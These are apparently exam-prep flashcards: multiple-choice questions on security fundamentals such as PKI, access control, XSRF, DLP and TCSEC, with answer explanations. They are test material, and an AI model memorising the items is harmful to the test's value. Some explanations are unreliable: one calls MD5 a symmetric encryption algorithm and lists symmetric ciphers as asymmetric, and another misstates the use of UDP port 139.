Test #2 Flashcards

1
Q

An organization is looking for a filtering solution that will help eliminate some of the recent problems it has had with viruses and worms. Which of the following best meets this requirement?

❍ A. Intrusion detection
❍ B. Malware inspection
❍ C. Load balancing
❍ D. Internet content filtering

A

Answer B is correct. A malware inspection filter is basically a web filter
applied to traffic that uses the HTTP protocol. The body of all HTTP
requests and responses is inspected. Malicious content is blocked while legitimate
content passes through unaltered. Answer A is incorrect because
intrusion-detection systems are designed to analyze data, identify attacks, and
respond to the intrusion. Answer C is incorrect because load balancers are
servers configured in a cluster to provide scalability and high availability.
Answer D is incorrect because Internet content filters use a collection of
terms, words, and phrases that are compared to content from browsers and
applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
  1. Which risk management response is being implemented when a company purchases
    insurance to protect against service outage?

❍ A. Acceptance
❍ B. Avoidance
❍ C. Mitigation
❍ D. Transference

A

Answer D is correct. The liability of risk is transferred through insurance
policies. Answer A is incorrect because accepting a risk is to do nothing in
response. Risk avoidance involves simply terminating the operation that produces
the risk, making answer B incorrect. Answer C is not correct because
mitigation applies a solution that results in a reduced level of risk or exposure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
  1. A collection of compromised computers running software installed by a Trojan horse or a worm is referred to as what?

❍ A. Zombie
❍ B. Botnet
❍ C. Herder
❍ D. Virus

A

Answer B is correct. Answers A and C are incorrect but are related to a botnet
in that a zombie is one of many computer systems that make up a botnet,
whereas a bot herder is the controller of the botnet. Answer D is incorrect. A
virus is a program that infects a computer without the knowledge of the user.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
  1. Adding a token for every POST or GET request that is initiated from the browser to the server can be used to mitigate which of the following attacks?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting
❍ D. Input validation error

A

Answer B is correct. In order to mitigate cross-site request forgery (XSRF)
attacks, the most common solution is to add a token for every POST or GET
request that is initiated from the browser to the server. Answer A is incorrect
because buffer overflows are associated with input validation. Answer C is
incorrect because setting the HTTPOnly flag on the session cookie is used to
mitigate XXS attacks. Answer D is incorrect because input validation tests
whether an application properly handles input from a source outside the
application destined for internal processing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
  1. Which of the following is one of the biggest challenges associated with database encryption?

❍ A. Multi-tenancy
❍ B. Key management
❍ C. Weak authentication components
❍ D. Platform support

A

Answer B is correct. One of the biggest challenges associated with database
encryption is key management. Answer A is incorrect because multi-tenancy is
a security issue related to cloud computing implementations. Answer C is
incorrect because lack of management software and weak authentication components
are associated with hardware hard drive encryption. Answer D is
incorrect because cost and platform support are concerns with smartphone
encryption products.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q
  1. Which form of access control enables data owners to extend access rights to other logons?

❍ A. MAC
❍ B. DAC
❍ C. Role-based (RBAC)
❍ D. Rule-based (RBAC)

A

Answer B is correct. Discretionary access control (DAC) systems enable data
owners to extend access rights to other logons. Mandatory access control
(MAC) systems require assignment of labels to extend access, making answer
A incorrect. Answers C and D are incorrect because both RBAC access control
forms rely on conditional assignment of access rules either inherited
(role-based) or by environmental factors such as time of day or secured terminal
location (rule-based).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q
  1. In a decentralized key management system, the user is responsible for which one of the following functions?

❍ A. Creation of the private and public key
❍ B. Creation of the digital certificate
❍ C. Creation of the CRL
❍ D. Revocation of the digital certificate

A

Answer A is correct. In a decentralized key system, the end user generates his
or her own key pair. The other functions, such as creation of the certificate,
CRL, and the revocation of the certificate, are still handled by the certificate
authority; therefore, answers B, C, and D are incorrect

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q
  1. What is the name given to the system of digital certificates and certificate authorities used for public key cryptography over networks?

❍ A. Protocol Key Instructions (PKI)
❍ B. Public Key Extranet (PKE)
❍ C. Protocol Key Infrastructure (PKI)
❍ D. Public Key Infrastructure (PKI)

A

Answer D is correct. Public Key Infrastructure describes the trust hierarchy
system for implementing a secure public key cryptography system over
TCP/IP networks. Answers A, B, and C are incorrect because these are bogus
terms.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q
  1. If Sally wants to send a secure message to Mark using public-key encryption but is not worried about sender verification, what does she need in addition to her original message text?

❍ A. Sally’s private key
❍ B. Sally’s public key
❍ C. Mark’s private key
❍ D. Mark’s public key

A

Answer D is correct. Sally needs Mark’s public key to encrypt her original
message in a form that only Mark can decrypt. Neither of Sally’s keys is needed
because the originator does not need to be validated, making answers A
and B incorrect. Answer C is incorrect because Mark’s private key is used for
decrypting the encrypted message to reveal Sally’s original message.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
  1. Which of the following methods would be the most effective method to physically secure laptops that are used in an environment such as an office?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer A is correct. Security cables with combination locks can provide such
security and are easy to use. They are used mostly to secure laptops and leave
the equipment exposed. Answer B is incorrect because PC Safe tower and
server cages are designed to bolt to the floor and are meant to be in an environment
that is static. Answer C is incorrect because a locked cabinet is an
alternative for equipment that is not used or does not have to be physically
accessed on a regular, daily basis. Vendors provide solutions such as a security
cabinet locker that secures CPU towers. The housing is made of durable,
heavy-duty steel for strength. Answer D is incorrect because a hardware lock
is used for license enforcement.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q
  1. Which of the following serves the purpose of trying to lure a malicious attacker into a system?

❍ A. Honeypot
❍ B. Pot of gold
❍ C. DMZ
❍ D. Bear trap

A

Answer A is correct. A honeypot is used to serve as a decoy and lure a malicious
attacker. Answers B and D are incorrect answers and are not legitimate
terms for testing purposes. Answer C is incorrect because a DMZ is an area
between the Internet and the internal network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q
  1. What is the recommended range of humidity level according to the ASHRAE?

❍ A. 10%–20%
❍ B. 30%–40%
❍ C. 40%–55%
❍ D. 55%–65%

A

Answer C is correct. The American Society of Heating, Refrigerating and Air-
Conditioning Engineers (ASHRAE) recommends optimal humidity levels in the
40% to 55% range, making answers A, B, and D incorrect. Very low levels of
humidity can promote the buildup of electrostatic charges that can harm sensitive
electronic components. Very high levels of humidity can promote condensation
on chilled surfaces and introduce liquid into operating equipment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q
  1. Which of the following is a network protocol that supports file transfers and is a combination of RCP and SSH?

❍ A. HTTPS
❍ B. FTPS
❍ C. SFTP
❍ D. SCP

A

Answer D is correct. The Secure Copy Protocol (SCP) is a network protocol
that supports file transfers. SCP is a combination of RCP and SSH. It uses the
BSD RCP protocol tunneled through the Secure Shell (SSH) protocol to provide
encryption and authentication. Answer A is incorrect because HTTPS is
used for secured web-based communications. Answer B is incorrect. FTPS,
also known as FTP Secure and FTP-SSL, is a FTP extension that adds support
for TLS and SSL. Answer C is incorrect because SFTP, or secure FTP, is
a program that uses SSH to transfer files. Unlike standard FTP, it encrypts
both commands and data, preventing passwords and sensitive information
from being transmitted in the clear over the network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
  1. You want to implement a technology solution for a small organization that can function as a single point of policy control and management for access to Internet content. Which of the following should you choose?

❍ A. Proxy gateway
❍ B. Circuit-level gateway
❍ C. Application-level gateway
❍ D. Web security gateway

A

Answer D is correct. Web security gateways offer a single point of policy control
and management for web-based content access. Answer A is too generic to
be a proper answer. Answer B is incorrect because a circuit-level gateway’s decisions
are based on source and destination addresses. Answer C is incorrect
because an application-level gateway understands services and protocols.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

You have recently had security breaches in the network. You suspect they might be coming from a telecommuter’s home network. Which of the following devices would you use to require a secure method for employees to access corporate
resources while working from home?

❍ A. A router
❍ B. A VPN concentrator
❍ C. A firewall
❍ D. A network-based IDS

A

Answer B is correct. A VPN concentrator is used to allow multiple users to
access network resources using secure features that are built into the device and
are deployed where the requirement is for a single device to handle a very large
number of VPN tunnels. Answer A is incorrect because a router forwards information
to its destination on the network or the Internet. A firewall protects computers
and networks from undesired access by the outside world; therefore,
answer C is incorrect. Answer D is incorrect because network-based intrusiondetection
systems monitor the packet flow and try to locate packets that are not
allowed for one reason or another and might have gotten through the firewall.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

At which layer of the OSI model does the Internet Protocol Security protocol function?

❍ A. Network layer
❍ B. Presentation layer
❍ C. Session layer
❍ D. Application layer

A

Answer A is correct. IPsec validation and encryption function at the network
layer of the OSI model. Answers B, C, and D are incorrect because IPsec functions
at a lower level of the OSI model.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q
  1. When troubleshooting SSL, which two layers of the OSI model are of most value?

❍ A. Application layer and Presentation layer
❍ B. Presentation layer and Session layer
❍ C. Application layer and Transport layer
❍ D. Physical layer and Data Link layer

A

Answer C is correct. SSL connections occur between the application and transport
layers. Answer A is incorrect because the Secure Sockets Layer SSL operates
at a deeper level. Answer B is incorrect because the Secure Sockets Layer transport
effectively fills the same role as these OSI model layers. Answer D is incorrect
because the data has been abstracted beyond the level at which SSL operates.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q
  1. Which of the three principles of security is supported by an iris biometric system?

❍ A. Confidentiality
❍ B. Integrity
❍ C. Availability
❍ D. Vulnerability

A

Answer A is correct. Confidentiality involves protecting against unauthorized
access, which biometric authentication systems support. Integrity is concerned
with preventing unauthorized modification, making answer B incorrect. Answer
C is not correct because availability is concerned with ensuring that access to
services and data is protected against disruption. Answer D is incorrect because
a vulnerability is a failure in one or more of the C-I-A principles.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q
  1. _________ describes the potential that a weakness in hardware, software, process, or people will be identified and taken advantage of.

❍ A. Vulnerability
❍ B. Exploit
❍ C. Threat
❍ D. Risk

A

Answer C is correct. A threat is the potential that a vulnerability will be identified
and exploited. Answer A is incorrect because a vulnerability is the weakness
itself and not the likelihood that it will be identified and exploited.
Answer B is incorrect because an exploit is the mechanism of taking advantage
of a vulnerability rather than its likelihood of occurrence. Answer D is incorrect
because risk is the likelihood that a threat will occur and the measure of
its effect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q
  1. Which of the following is not a principal concern for first responders to a hacking
    incident within a corporation operating in the United States?

❍ A. Whether EMI shielding is intact
❍ B. Whether data is gathered properly
❍ C. Whether data is protected from modification
❍ D. Whether collected data is complete

A

Answer A is correct. EMI shielding is important to protecting data and services
against unauthorized interception as well as interference but is not a principal
concern for first responders following an incident. First responders must
ensure that data is collected correctly and protect it from modification using
proper controls, ensuring a clear chain of evidence, making answers B and C
incorrect. Answer D is incorrect because a first responder might be the only
agent able to ensure that all data is collected before being lost due to volatility
of storage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q
  1. Which rule of evidence within the United States involves Fourth Amendment protections?

❍ A. Admissible
❍ B. Complete
❍ C. Reliable
❍ D. Believable

A

Answer A is correct. Admissibility involves collecting data in a manner that
ensures its viability in court, including legal requirements such as the Fourth
Amendment protections against unlawful search and seizure. Answers B and C
are incorrect because data must be collected completely and protected against
modification to ensure reliability, but these are not concerns of the Fourth
Amendment. Answer D is incorrect because believability focuses on evidence
being understandable, documented, and not subject to modification during
transition.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q
  1. A user has downloaded trial software and subsequently downloads a key generator
    in order to unlock the trial software. The user’s antivirus detection software now alerts the user that the system is infected. Which one of the following best describes the type of malware infecting the system?

❍ A. Logic bomb
❍ B. Trojan
❍ C. Adware
❍ D. Worm

A

Answer B is correct. Trojans are programs disguised as something useful. In
this instance, the user was likely illegally trying to crack software, and in the
process infect the system with malware. Although answers A, C, and D are
types of malware, they are not the best choices.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q
  1. Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?

❍ A. DoS
❍ B. Masquerading
❍ C. DDoS
❍ D. Trojan horse

A

Answer C is correct. A distributed denial of service (DDoS) is similar to a
denial-of-service (DoS) attack in that they both try to prevent legitimate
access to services. However, a DDoS is a coordinated effort among many
computer systems; therefore, answer A is incorrect. Masquerading involves
using someone else’s identity to access resources; therefore, answer B is incorrect.
A Trojan horse is a program used to perform hidden functions; therefore,
answer D is incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q
  1. What is the name given to the activity that consists of collecting information that will be later used for monitoring and review purposes?

❍ A. Logging
❍ B. Auditing
❍ C. Inspecting
❍ D. Vetting

A

Answer A is correct. Logging is the process of collecting data to be used for
monitoring and auditing purposes. Auditing is the process of verification that
normally involves going through log files; therefore, answer B is incorrect.
Typically, the log files are frequently inspected, and inspection is not the
process of collecting the data; therefore, answer C is incorrect. Vetting is the
process of thorough examination or evaluation; therefore, answer D is incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q
  1. Which of the following are not methods for minimizing a threat to a web server?
    (Choose the two best answers.)

❍ A. Disable all non-web services
❍ B. Ensure Telnet is running
❍ C. Disable nonessential services
❍ D. Enable logging

A

Answers B and D are correct. Having Telnet enabled presents security issues
and is not a primary method for minimizing threat. Logging is important for
secure operations and is invaluable when recovering from a security incident.
However, it is not a primary method for reducing threat. Answer A is incorrect
because disabling all non-web services might provide a secure solution for
minimizing threats. Answer C is incorrect because each network service carries
its own risks; therefore, it is important to disable all nonessential services.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q
  1. The organization is concerned about bugs in commercial off-the-shelf (COTS) software. Which of the following might be the only means of reviewing the security quality of the program?

❍ A. Fuzzing
❍ B. Cross-site scripting
❍ C. Input validation
❍ D. Cross-site request forgery

A

Answer A is correct. In some closed application instances, fuzzing might be
the only means of reviewing the security quality of the program. Answer B is
incorrect because cross-site scripting (XXS) vulnerabilities can be used to
hijack the user’s session or to cause the user accessing malware-tainted Site A
to unknowingly attack Site B on behalf of the attacker who planted code on
Site A. Answer C is incorrect because input validation tests whether an application
properly handles input from a source outside the application destined
for internal processing. Answer D, Cross-site Request Forgery (XSRF), is an
attack in which the end user executes unwanted actions on a web application
while she is currently authenticated.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q
  1. Which of the following is an attack in which the end user executes unwanted actions on a web application while he is currently authenticated?

❍ A. Buffer overflow
❍ B. Input validation error
❍ C. Cross-site scripting
❍ D. Cross-site request forgery

A

Answer D is correct. Cross-site Request Forgery (XSRF) is an attack in which
the end user executes unwanted actions on a web application while he is currently
authenticated. Answer A is incorrect because a buffer overflow is a
direct result of poor or incorrect input validation or mishandled exceptions.
Answer B is incorrect because input validation errors are a result of improper
field checking in the code. Answer C is incorrect because cross-site scripting
(XXS) vulnerabilities can be used to hijack the user’s session or to cause the
user accessing malware-tainted Site A to unknowingly attack Site B on behalf
of the attacker who planted code on Site A.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q
  1. Which of the follow methods would be the most effective method to physically secure computers that are used in a lab environment that operates on a part-time basis?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer C is correct. A locked cabinet is an alternative for equipment that is not
used or does not have to be physically accessed on a regular, daily basis. Vendors
provide solutions such as a security cabinet locker that secures CPU towers. The
housing is made of durable, heavy-duty steel for strength. Answer A is incorrect
because security cables with combination locks can provide such security and are
easy to use but are used mostly to secure laptops and leave the equipment
exposed. Answer B is incorrect because PC Safe tower and server cages are
designed to bolt to the floor and are meant to be in an environment that is static.
Answer D is incorrect because a hardware lock is used for license enforcement.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q
  1. Which of the following methods would be the most effective to physically secure tower-style computers in a financial organization?

❍ A. Security cables
❍ B. Server cages
❍ C. Locked cabinet
❍ D. Hardware locks

A

Answer B is correct. Products such as PC Safe tower and server cages are
designed to bolt to the floor and are meant to be in an environment that is
static. For example, financial businesses have been hit hard by theft of desktop
computers because they hold a lot of personal data. Answer A is incorrect
because security cables with combination locks can provide such security and
are easy to use and are used mostly to secure laptops and leave the equipment
exposed. Answer C is incorrect because a locked cabinet is an alternative for
equipment that is not used or does not have to be physically accessed on a
regular, daily basis. Answer D is incorrect because a hardware lock, also
known as a software protection dongle, is used for license enforcement.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q
  1. Your organization is exploring data loss prevention solutions. The proposed solution
    is an end-point solution. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer C is correct. Protection of data in use is considered to be an endpoint
solution and the application is run on end-user workstations or servers in the
organization. Answer A is incorrect because protection of data in motion is considered to be a network solution and either a hardware or software solution
is installed near the network perimeter to monitor for and flag policy violations.
Answer B is incorrect because protection of data at rest is considered to be a
storage solution and is generally a software solution that monitors how confidential
data is stored. Answer D is incorrect because there is no such data state.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q
  1. Which of the following uses a secure crypto-processor to authenticate hardware
    devices such as PC or laptop?

❍ A. Public Key Infrastructure
❍ B. Full disk encryption
❍ C. File-level encryption
❍ D. Trusted Platform Module

A

Answer D is correct. TPM refers to a secure crypto-processor used to authenticate
hardware devices such as PC or laptop. The idea behind TPM is to allow
any encryption-enabled application to take advantage of the chip. Answer A is
incorrect because Public Key Infrastructure (PKI) is a set of hardware, software,
people, policies, and procedures needed to create, manage, distribute,
use, store, and revoke digital certificates. Answer B is incorrect because fulldisk
encryption involves encrypting the operating system partition on a computer
and then booting and running with the system drive encrypted at all
times. Answer C is incorrect because in file- or folder-level encryption, individual
files or directories are encrypted by the file system itself.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q
  1. Which process involves verifying keys as being authentic?

❍ A. Authorization
❍ B. Authentication
❍ C. Access control
❍ D. Verification

A

Answer B is correct. Authentication involves the presentation and verification
of credentials of keys as being authentic. Answer A is incorrect because
authorization involves checking authenticated credentials against a list of
authorized security principles. Once checked, resource access is allowed or
limited based on Access Control constraints, making answer C incorrect.
Answer D is incorrect because verification of credentials occurs during
authentication (as being authentic) and authorization (as being authorized to
request resource access) and is not a recognized access control process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q
  1. Which category of authentication includes smart cards?

❍ A. Something you know
❍ B. Something you have
❍ C. Something you are
❍ D. Something you do

A

Answer B is correct. Something you have includes smart cards, tokens, and
keys. Something you know includes account logons, passwords, and PINs,
making answer A incorrect. Answers C and D are incorrect because both
something you are and something you do involve measures of personal biological
qualities and do not require an external device such as a smart card or key.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q
  1. Which of the following is not a division of access control as defined by the Orange Book?

❍ A. Discretionary
❍ B. Limited
❍ C. Mandatory
❍ D. Verified

A

Answer B is correct. “Limited” is not an access control designation within the
Trusted Computer System Evaluation Criteria (TCSEC) document DoD 5200.28-STD, often referred to as the “Orange Book.” The four divisions are Mandatory, Discretionary, Minimal, and Verified— making answers A, C, and
D incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q
  1. Which division of TCSEC access control includes the subdivisions Controlled Access Protection and Discretionary Security Protection?

❍ A. Division A
❍ B. Division B
❍ C. Division C
❍ D. Division D

A

Answer C is correct. Discretionary access control (C-level) includes subdivisions
Discretionary Security Protection (C1) and Controlled Access
Protection (C2) based on details such as data segmentation and logging.
These are not subdivisions of the Minimal (D-level), Mandatory (B-level), or
Verified (A-level) access control divisions—making answers A, B, and D
incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q
  1. Which of the following is a hybrid crypto system?

❍ A. IDEA
❍ B. MD5
❍ C. RSA
❍ D. PGP

A

Answer D is correct. Pretty Good Privacy (PGP) is a hybrid cryptosystem that
makes use of the incorrect choices, A, B, and C. IDEA is a symmetric encryption
cipher, RSA is an asymmetric cipher, and MD5 is a hash.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q
  1. Which of the following is the type of algorithm used by MD5?

❍ A. Block cipher algorithm
❍ B. Hashing algorithm
❍ C. Asymmetric encryption algorithm
❍ D. Cryptographic algorithm

A

Answer B is correct. Although the Message Digest (MD) series of algorithms
is classified globally as a symmetric key encryption algorithm, the correct
answer is hashing algorithm, which is the method that the algorithm uses to
encrypt data. Answer A in incorrect because a block cipher divides the message
into blocks of bits. Answer C is incorrect because MD5 is a symmetric
key algorithm, not an asymmetric encryption algorithm (examples of this
include RC6, Twofish, and Rijndael). Answer D is incorrect because cryptographic
algorithm is a bogus term.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q
  1. To check the validity of a digital certificate, which one of the following would be used?

❍ A. Corporate security policy
❍ B. Certificate policy
❍ C. Certificate revocation list
❍ D. Expired domain names

A

Answer C is correct. A certificate revocation list (CRL) provides a detailed list
of certificates that are no longer valid. A corporate security policy would not
provide current information on the validity of issued certificates; therefore,
answer A is incorrect. A certificate policy does not provide information on
invalid issued certificates, either; therefore, answer B is incorrect. Finally, an
expired domain name has no bearing on the validity of a digital certificate;
therefore, answer D is incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q
  1. What is the acronym for the de facto cryptographic message standards developed
    by RSA Laboratories?

❍ A. PKIX
❍ B. X.509
❍ C. PKCS
❍ D. Both A and C

A

Answer C is correct. The Public Key Cryptography Standards (PKCS) are the
de facto cryptographic message standards developed and maintained by RSA
Laboratories, a division of the RSA Security Corporation. PKIX describes the
development of Internet standards for X.509-based digital certificates; therefore,
answers A, B, and D are incorrect.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q
  1. Which of the following is true of digital signatures? (Choose the two best answers.)

❍ A. They use the skipjack algorithm.
❍ B. They can be automatically time-stamped.
❍ C. They allow the sender to repudiate that the message was sent.
❍ D. They cannot be imitated by someone else.

A

Answers B and D are correct. Digital signatures offer several features and capabilities.
This includes being able to ensure the sender cannot repudiate that he
or she used the signature. In addition, non-repudiation schemes are capable of
offering time stamps for the digital signature. Answer A is incorrect. The
Skipjack algorithm was developed for use with a chipset developed by the U.S.
government. Skipjack provides only for encryption. Answer C is incorrect, as a
key feature of digital signatures is to provide for non-repudiation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q
  1. What is the recommended best model of privilege management in a large extended enterprise?

❍ A. DACLs
❍ B. User-based
❍ C. SACLs
❍ D. Group-based

A

Answer D is correct. Group-based privilege management is generally the best
model for assignment of rights and denials in large extended enterprise environments,
as a user’s rights can be easily reviewed by examining its group
membership. Answer B is incorrect because user-based privilege management
requires significant overhead to provision and de-provision individual permissions
and can leave unauthorized access rights after personnel transfer between
organizational roles or locales. Answers A and C are incorrect because both
discretionary (DACLs) and system access control lists (SACLs) are produced as
the result of privilege assignment and not models of management.

42
Q
  1. Which authorization protocol is generally compatible with TACACS?

❍ A. LDAP
❍ B. RADIUS
❍ C. TACACS+
❍ D. XTACACS

A

Answer D is correct. The Extended Terminal Access Controller Access
Control System (XTACACS) protocol is a proprietary form of the TACACS
protocol developed by Cisco and is compatible in many cases. Neither LDAP
nor RADIUS is affiliated with the TACACS protocol, making answers A and
B incorrect. Answer C is incorrect because the newer TACACS+ is not
backward-compatible with its legacy equivalent.

43
Q
  1. Your organization is exploring data loss prevention solutions. The proposed solution
    is a software storage solution that monitors how confidential data is stored. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer B is correct. Protection of data at rest is considered to be a storage
solution and is generally a software solution that monitors how confidential
data is stored. Answer C is incorrect because protection of data in use is considered
to be an endpoint solution and the application is run on end-user
workstations or servers in the organization. Answer A is incorrect because
protection of data in motion is considered to be a network solution and either
a hardware or software solution is installed near the network perimeter to
monitor for and flag policy violations. Answer D is incorrect because there is
no such data state.

44
Q
  1. Which of the following is needed to establish effective security baselines for host
    systems? (Select two correct answers.)

❍ A. Cable locks
❍ B. Mandatory settings
❍ C. Standard application suites
❍ D. Decentralized administration

A

Answers B and C are correct. In order to establish effective security baselines,
enterprise network security management requires a measure of commonality
between the systems. Mandatory settings, standard application suites, and initial
setup configuration details all factor into the security stance of an enterprise
network. Answer A is incorrect because cable locks have nothing to do
with effective security baselines. Answer D is incorrect because decentralized
management does not have anything to do with security baselines.

45
Q
  1. Which of the following types of attacks is executed by placing malicious executable
    code on a website?

❍ A. Buffer overflow
❍ B. Cross-site request forgery (XSRF)
❍ C. Cross-site scripting (XXS)
❍ D. Input validation error

A

Answer C is correct. Cross-site scripting (XXS) vulnerabilities can be used to
hijack the user’s session or to cause the user accessing malware-tainted Site A
to unknowingly attack Site B on behalf of the attacker who planted code on
Site A. Answer A is incorrect because a buffer overflow is a direct result of
poor or incorrect input validation or mishandled exceptions. Answer B is
incorrect. The key element to understanding XSRF is that attackers are betting
that users have a validated login cookie for the website already stored in
their browsers. Answer D is incorrect because input validation errors are a
result of improper field checking in the code.

46
Q
  1. Which of the following are examples of protocol analyzers? (Select all correct answers.)

❍ A. Metasploit
❍ B. Wireshark
❍ C. SATAN
❍ D. Network Monitor

A

Answers B and D are correct. Windows Server operating systems come with a
protocol analyzer called Network Monitor. Third-party programs such as
Wireshark can also be used for network monitoring. Metasploit is a framework
used for penetration testing, and SATAN is a network security testing
tool; therefore, answers A and C are incorrect.

47
Q
  1. Which one of the following is not an example of a type of virus?

❍ A. Boot sector
❍ B. Macro
❍ C. Stealth
❍ D. Multiparisite

A

Answer D is correct. Answers A, B, and C each represent a different type of
virus. Multiparisite is not a type of computer virus; however, a multipartite is a
type of virus that describes a hybrid of a boot sector and program virus.

48
Q
  1. Which form of cabling is least susceptible to EM interference?

❍ A. STP
❍ B. UTP
❍ C. Co-axial
❍ D. Fiber-optic

A

Answer D is correct. Fiber-optic cabling is least subject to electromagnetic (EM)
interference because its communications are conducted by transmitting pulses of
light over glass, plastic, or sapphire transmission fibers. Twisted-pair (shielded
STP as well as unshielded UTP) copper cables provide minimal shielding against
interference but can function as antenna picking up nearby EM sources when
extended over long cable runs, making answers A and B incorrect. Answer C is
incorrect because, although co-axial cables limit EM interference by encasing
one conductor in a sheath of conductive material, they are still conductive and
not as resistant as purely optical forms of communication

49
Q
  1. Which of the following is not a factor used in asset identification?

❍ A. Methods of access
❍ B. Original and replacement costs
❍ C. Maintenance costs
❍ D. Profit generated

A

Answer A is correct. Methods of access are identified during the risk and threat
assessment rather than during asset identification. Asset identification involves
original and replacement costs along with maintenance costs and profits generated
by the asset. Consequently, answers B, C, and D are incorrect.

50
Q
  1. It is suspected that some recent network compromises are originating from the
    use of SNMP. Which of the following UDP port traffic should be monitored?
    (Choose two correct answers.)

❍ A. 161
❍ B. 139
❍ C. 138
❍ D. 162

A

Answers A and D are correct. UDP ports 161 and 162 are used by SNMP.
Answer B is incorrect because UDP uses port 139 for network sharing.
Answer C is incorrect because port 138 is used to allow NetBIOS traffic for
name resolution.

51
Q
  1. You are implementing network access for several internal business units that work with sensitive information on a small organizational network. Which of the following would best mitigate risk associated with users improperly accessing other segments of the network without adding additional switches?

❍ A. Log analysis
❍ B. Access Control Lists
❍ C. Network segmentation
❍ D. Proper VLAN management

A

Answer D is correct. VLANs provide a way to limit broadcast traffic in a
switched network. This creates a boundary and, in essence, creates multiple,
isolated LANs on one switch. Answer A is incorrect because logging is the
process of collecting data to be used for monitoring and auditing purposes.
Answer B is incorrect because access control generally refers to the process of
making resources available to accounts that should have access while limiting
that access to only what is required. Answer C is incorrect because access network
segmentation is used for interconnected networks where one compromised
system on one network can easily spread to other networks.

52
Q
  1. Your organization is exploring data loss prevention solutions. The proposed solution
    is a software network solution installed near the network perimeter to monitor for and flag policy violations. This solution is targeting which of the following data states?

❍ A. In motion
❍ B. At rest
❍ C. In use
❍ D. At flux

A

Answer A is correct. Protection of data in motion is considered to be a network
solution, and either a hardware or software solution is installed near the network
perimeter to monitor for and flag policy violations. Answer B is incorrect
because protection of data at rest is considered to be a storage solution and is
generally a software solution that monitors how confidential data is stored.
Answer C is incorrect because protection of data in use is considered to be an
endpoint solution and the application is run on end-user workstations or servers
in the organization. Answer D is incorrect because there is no such data state.

53
Q
  1. What is the first step in performing a basic forensic analysis?

❍ A. Ensure that the evidence is acceptable in a court of law
❍ B. Identify the evidence
❍ C. Extract, process, and interpret the evidence
❍ D. Determine how to preserve the evidence

A

Answer B is correct. It is necessary to first identify the evidence that is available
to be collected. Answer A is incorrect because protecting the data’s value
as evidence must come after the type and form of evidence is known.
Extraction, preservation, processing, and interpretation of evidence also follow
the identification of data types and storage that must be collected, making
answers C and D incorrect.

54
Q
  1. Which of the following is not true regarding expiration dates of certificates?

❍ A. Certificates may be issued for a week.
❍ B. Certificates are issued only at yearly intervals.
❍ C. Certificates may be issued for 20 years.
❍ D. Certificates must always have an expiration date.

A

Answer B is correct. Digital certificates contain a field indicating the date to
which the certificate is valid. This date is mandatory, and the validity period
can vary from a short period of time up to a number of years; therefore,
answers A, C, and D are incorrect.

55
Q
  1. Which of the following statements are true when discussing physical security?
    (Select all correct answers.)

❍ A. Physical security attempts to control access to data from Internet
users.
❍ B. Physical security attempts to control unwanted access to specified
areas of a building.
❍ C. Physical security attempts to control the effect of natural disasters on
facilities and equipment.
❍ D. Physical security attempts to control internal employee access into
secure areas.

A

Answers B, C, and D are correct. Natural disasters, unwanted access, and user
restrictions are all physical security issues. Preventing Internet users from getting
to data is data security, not physical security; therefore, answer A is incorrect.

56
Q
  1. Which type of authorization provides no mechanism for unique logon
    identification?

❍ A. Anonymous
❍ B. Kerberos
❍ C. TACACS
❍ D. TACACS+

A

Answer A is correct. During anonymous access, such as requests to a public
FTP server, unique identify of the requester is not determined and so cannot
be used for personalized logon identification. Answers B, C, and D are incorrect
because authorization services such as Kerberos, TACACS, and its
replacement TACACS+ all verify access requests against a list of authorized
credentials and so can log individual visits and identify access request logons.

57
Q
